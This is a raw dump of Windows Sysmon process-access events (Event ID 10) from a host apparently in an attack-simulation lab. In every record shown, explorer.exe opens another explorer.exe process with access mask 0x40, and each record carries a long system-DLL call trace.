22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694637Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694636Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694635Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694634Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694633Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694632Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694631Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694630Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694629Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694628Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694627Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694626Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694625Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694624Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694623Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694622Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694621Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694620Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694619Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694618Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694617Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694616Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694615Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694614Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694613Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694612Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694611Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694610Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 